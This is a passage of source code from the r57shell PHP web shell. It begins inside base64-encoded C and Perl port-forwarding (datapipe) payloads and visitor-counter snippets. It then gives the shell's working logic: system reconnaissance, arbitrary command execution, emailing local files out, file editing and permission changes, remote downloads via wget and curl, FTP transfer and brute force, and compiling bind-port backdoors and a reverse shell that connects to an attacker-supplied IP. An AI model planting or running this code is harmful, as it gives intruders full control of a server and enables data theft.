ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm lsZSk7DQogIHJldHVybiAwOw0KfQ=='; $datapipe_pl='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo='; $c1 = 'PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L 3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=='; $c2 = 'PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u 8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV ybmV0LS0+'; echo $head; echo ''; if(empty($_POST['cmd'])) { $serv = array(127,192,172,10); $addr=@explode('.', $_SERVER['SERVER_ADDR']); $current_version = str_replace('.','',$version); if (!in_array($addr[0], $serv)) { @print ''; @readfile ('http://127.0.0.1/r57shell/version.php?version='.$current_version.'');}} echo '
'.ws(1).'  !'.ws(2).'r57shell '.$version.' '; echo ws(2); echo ''.date ('d-m-Y H:i:s').''; echo ws(2).$lb.' phpinfo '.$rb; echo ws(2).$lb.' php.ini '.$rb; echo ws(2).$lb.' cpu '.$rb; echo ws(2).$lb.' mem '.$rb; if($unix) { echo ws(2).$lb.' users '.$rb; } echo ws(2).$lb.' tmp '.$rb; echo ws(2).$lb.' delete '.$rb.'
'; echo ws(2); echo (($safe_mode)?('safe_mode: ON'):('safe_mode: OFF')); echo ws(2); echo 'PHP version: '.@phpversion().''; $curl_on = @function_exists('curl_version'); echo ws(2); echo 'cURL: '.(($curl_on)?('ON'):('OFF')); echo ws(2); echo 'MySQL: '; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo 'ON'; } else { echo 'OFF'; } echo ws(2); echo 'MSSQL: '; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo 'ON';}else{echo 'OFF';} echo ws(2); echo 'PostgreSQL: '; $pg_on = @function_exists('pg_connect'); if($pg_on){echo 'ON';}else{echo 'OFF';} echo ws(2); echo 'Oracle: '; $ora_on = @function_exists('ocilogon'); if($ora_on){echo 'ON';}else{echo 'OFF';} echo '
'.ws(2); echo 'Disable functions : '; if(''==($df=@ini_get('disable_functions'))){echo 'NONE';}else{echo '$df';} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} $used = $all-$free; $used_percent = @round(100/($all/$free),2); echo '
'.ws(2).'HDD Free : '.view_size($free).' HDD Total : '.view_size($all).''; echo '
'; echo $font; if(!$windows){ echo 'uname -a :'.ws(1).'
sysctl :'.ws(1).'
$OSTYPE :'.ws(1).'
Server :'.ws(1).'
id :'.ws(1).'
pwd :'.ws(1).'

'; echo '
'; echo ''; $uname = ex('uname -a'); echo((!empty($uname))?(ws(3).@substr($uname,0,120).'
'):(ws(3).@substr(@php_uname(),0,120).'
')); if(!$safe_mode){ $bsd1 = ex('sysctl -n kern.ostype'); $bsd2 = ex('sysctl -n kern.osrelease'); $lin1 = ex('sysctl -n kernel.ostype'); $lin2 = ex('sysctl -n kernel.osrelease'); } if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = '$bsd1 $bsd2'; } else if (!empty($lin1)&&!empty($lin2)) {$sysctl = '$lin1 $lin2'; } else { $sysctl = '-'; } echo ws(3).$sysctl.'
'; echo ws(3).ex('echo $OSTYPE').'
'; echo ws(3).@substr($SERVER_SOFTWARE,0,120).'
'; $id = ex('id'); echo((!empty($id))?(ws(3).$id.'
'):(ws(3).'user='.@get_current_user().' uid='.@getmyuid().' gid='.@getmygid().'
')); echo ws(3).$dir; echo ws(3).'( '.perms(@fileperms($dir)).' )'; echo '
'; } else { echo 'OS :'.ws(1).'
Server :'.ws(1).'
User :'.ws(1).'
pwd :'.ws(1).'

'; echo '
'; echo ''; echo ws(3).@substr(@php_uname(),0,120).'
'; echo ws(3).@substr($SERVER_SOFTWARE,0,120).'
'; echo ws(3).@get_current_user().'
'; echo ws(3).$dir; echo '
'; } echo ''; echo '
'; if(empty($c1)||empty($c2)) { die(); } $f = '
'; $f .= base64_decode($c1); $f .= base64_decode($c2); if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=='mail') { $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],'From: '.$POST['from'].'\r\n'); mr($language,$res); $_POST['cmd']=''; } if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=='mail_file' && !empty($_POST['loc_file'])) { if(!$file=@fopen($_POST['loc_file'],'r')) { echo re($_POST['loc_file']); $_POST['cmd']=''; } else { $filename = @basename($_POST['loc_file']); $filedump = @fread($file,@filesize($_POST['loc_file'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); $attach = array( 'name'=>$filename, 'type'=>$mime_type, 'content'=>$filedump ); if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); mr($language,$res); $_POST['cmd']=''; } } if(!empty($_POST['cmd']) && $_POST['cmd'] == 'find_text') { $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; } if(!empty($_POST['cmd']) && $_POST['cmd']=='ch_') { switch($_POST['what']) { case 'own': @chown($_POST['param1'],$_POST['param2']); break; case 'grp': @chgrp($_POST['param1'],$_POST['param2']); break; case 'mod': @chmod($_POST['param1'],intval($_POST['param2'], 8)); break; } $_POST['cmd']=''; } if(!empty($_POST['cmd']) && $_POST['cmd']=='mk') { switch($_POST['what']) { case 'file': if($_POST['action'] == 'create') { if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],'w')) { echo ce($_POST['mk_name']); $_POST['cmd']=''; } else { fclose($file); $_POST['e_name'] = $_POST['mk_name']; $_POST['cmd']='edit_file'; echo '
'.$lang[$language.'_text61'].'
'; } } else if($_POST['action'] == 'delete') { if(unlink($_POST['mk_name'])) echo '
'.$lang[$language.'_text63'].'
'; $_POST['cmd']=''; } break; case 'dir': if($_POST['action'] == 'create'){ if(mkdir($_POST['mk_name'])) { $_POST['cmd']=''; echo '
'.$lang[$language.'_text62'].'
'; } else { echo ce($_POST['mk_name']); $_POST['cmd']=''; } } else if($_POST['action'] == 'delete'){ if(rmdir($_POST['mk_name'])) echo '
'.$lang[$language.'_text64'].'
'; $_POST['cmd']=''; } break; } } if(!empty($_POST['cmd']) && $_POST['cmd']=='edit_file' && !empty($_POST['e_name'])) { if(!$file=@fopen($_POST['e_name'],'r+')) { $only_read = 1; @fclose($file); } if(!$file=@fopen($_POST['e_name'],'r')) { echo re($_POST['e_name']); $_POST['cmd']=''; } else { echo $table_up3; echo $font; echo '
'; echo ws(3).''.$_POST['e_name'].''; echo '
'; echo ''; echo ''; echo ''; echo (!empty($only_read)?('

'.$lang[$language.'_text44']):('

')); echo '
'; echo '
'; echo '
'; echo ''; exit(); } } if(!empty($_POST['cmd']) && $_POST['cmd']=='save_file') { if(!$file=@fopen($_POST['e_name'],'w')) { echo we($_POST['e_name']); } else { @fwrite($file,$_POST['e_text']); @fclose($file); $_POST['cmd']=''; echo '
'.$lang[$language.'_text45'].'
'; } } if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=='C')) { cf('/tmp/bd.c',$port_bind_bd_c); $blah = ex('gcc -o /tmp/bd /tmp/bd.c'); @unlink('/tmp/bd.c'); $blah = ex('/tmp/bd '.$_POST['port'].' '.$_POST['bind_pass'].' &'); $_POST['cmd']='ps -aux | grep bd'; } if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=='Perl')) { cf('/tmp/bdpl',$port_bind_bd_pl); $p2=which('perl'); if(empty($p2)) $p2='perl'; $blah = ex($p2.' /tmp/bdpl '.$_POST['port'].' &'); $_POST['cmd']='ps -aux | grep bdpl'; } if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=='Perl')) { cf('/tmp/back',$back_connect); $p2=which('perl'); if(empty($p2)) $p2='perl'; $blah = ex($p2.' /tmp/back '.$_POST['ip'].' '.$_POST['port'].' &'); $_POST['cmd']='echo \'Now script try connect to '.$_POST['ip'].' port '.$_POST['port'].' ...\''; } if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=='C')) { cf('/tmp/back.c',$back_connect_c); $blah = ex('gcc -o /tmp/backc /tmp/back.c'); @unlink('/tmp/back.c'); $blah = ex('/tmp/backc '.$_POST['ip'].' '.$_POST['port'].' &'); $_POST['cmd']='echo \'Now script try connect to '.$_POST['ip'].' port '.$_POST['port'].' ...\''; } if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=='Perl')) { cf('/tmp/dp',$datapipe_pl); $p2=which('perl'); if(empty($p2)) $p2='perl'; $blah = ex($p2.' /tmp/dp '.$_POST['local_port'].' '.$_POST['remote_host'].' '.$_POST['remote_port'].' &'); $_POST['cmd']='ps -aux | grep dp'; } if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=='C')) { cf('/tmp/dpc.c',$datapipe_c); $blah = ex('gcc -o /tmp/dpc /tmp/dpc.c'); @unlink('/tmp/dpc.c'); $blah = ex('/tmp/dpc '.$_POST['local_port'].' '.$_POST['remote_port'].' '.$_POST['remote_host'].' &'); $_POST['cmd']='ps -aux | grep dpc'; } if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} if (!empty($HTTP_POST_FILES['userfile']['name'])) { if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } else { $nfn = $HTTP_POST_FILES['userfile']['name']; } @copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['dir'].'/'.$nfn) or print('
Error uploading file '.$HTTP_POST_FILES['userfile']['name'].'
'); } if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) { switch($_POST['with']) { case wget: $_POST['cmd'] = which('wget').' '.$_POST['rem_file'].' -O '.$_POST['loc_file'].''; break; case fetch: $_POST['cmd'] = which('fetch').' -o '.$_POST['loc_file'].' -p '.$_POST['rem_file'].''; break; case lynx: $_POST['cmd'] = which('lynx').' -source '.$_POST['rem_file'].' > '.$_POST['loc_file'].''; break; case links: $_POST['cmd'] = which('links').' -source '.$_POST['rem_file'].' > '.$_POST['loc_file'].''; break; case GET: $_POST['cmd'] = which('GET').' '.$_POST['rem_file'].' > '.$_POST['loc_file'].''; break; case curl: $_POST['cmd'] = which('curl').' '.$_POST['rem_file'].' -o '.$_POST['loc_file'].''; break; } } if(!empty($_POST['cmd']) && ($_POST['cmd']=='ftp_file_up' || $_POST['cmd']=='ftp_file_down')) { list($ftp_server,$ftp_port) = split(':',$_POST['ftp_server_port']); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { fe($language,0); } else { if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); } else { if($_POST['cmd']=='ftp_file_down') { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } if($_POST['cmd']=='ftp_file_up') { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } } } @ftp_close($connection); $_POST['cmd'] = ''; } if(!empty($_POST['cmd']) && $_POST['cmd']=='ftp_brute') { list($ftp_server,$ftp_port) = split(':',$_POST['ftp_server_port']); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { fe($language,0); $_POST['cmd'] = ''; } else if(!$users=get_users()) { echo '
'.$lang[$language.'_text96'].'
'; $_POST['cmd'] = ''; } @ftp_close($connection); } echo $table_up3; if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?('dir'):('ls -lia'); } else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']='safe_dir'; } echo $font.$lang[$language.'_text1'].': '.$_POST['cmd'].'
'; echo '
'; echo ''; echo ''; function up_down($id) { global $lang; global $language; return ' '; } function div($id) { if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '
'; return '
'; } if(!$safe_mode){ echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts; echo sr(15,''.$lang[$language.'_text3'].$arrow.'',in('text','cmd',85,'')); echo sr(15,''.$lang[$language.'_text4'].$arrow.'',in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); echo $te.'
'.$table_end1.$fe; } else{ echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts; echo sr(15,''.$lang[$language.'_text4'].$arrow.'',in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); echo $te.'
'.$table_end1.$fe; } echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts; echo sr(15,''.$lang[$language.'_text43'].$arrow.'',in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); echo $te.''.$table_end1.$fe; if($safe_mode){ echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts; echo sr(15,''.$lang[$language.'_text58'].$arrow.'',in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):('new_name'))).ws(4).''.ws(3).''.in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); echo $te.''.$table_end1.$fe; } if($safe_mode && $unix){ echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts; echo sr(15,''.$lang[$language.'_text68'].$arrow.'',''.ws(2).''.$lang[$language.'_text69'].$arrow.''.ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):('filename'))).ws(2).''.$lang[$language.'_text70'].$arrow.''.ws(2).in('text','param2 title=''.$lang[$language.'_text71'].''',26,(($_POST['param2'])?($_POST['param2']):('0777'))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); echo $te.''.$table_end1.$fe; } if(!$safe_mode){ foreach ($aliases as $alias_name=>$alias_cmd) { $aliases2 .= ''; } echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts; echo sr(15,''.ws(9).$lang[$language.'_text8'].$arrow.ws(4).'',''.in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); echo $te.''.$table_end1.$fe; } echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts; echo sr(15,''.$lang[$language.'_text52'].$arrow.'',in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); echo sr(15,''.$lang[$language.'_text53'].$arrow.'',in('text','s_dir',85,$dir).' * ( /root;/home;/tmp )'); echo sr(15,''.$lang[$language.'_text55'].$arrow.'',in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php').'* ( .txt;.php;.htm )'.in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); echo $te.''.$table_end1.$fe; if(!$safe_mode && $unix){ echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts; echo sr(15,''.$lang[$language.'_text72'].$arrow.'',in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); echo sr(15,''.$lang[$language.'_text73'].$arrow.'',in('text','s_dir',85,$dir).' * ( /root;/home;/tmp )'); echo sr(15,''.$lang[$language.'_text74'].$arrow.'',in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); echo $te.''.$table_end1.$fe; } echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font; echo '
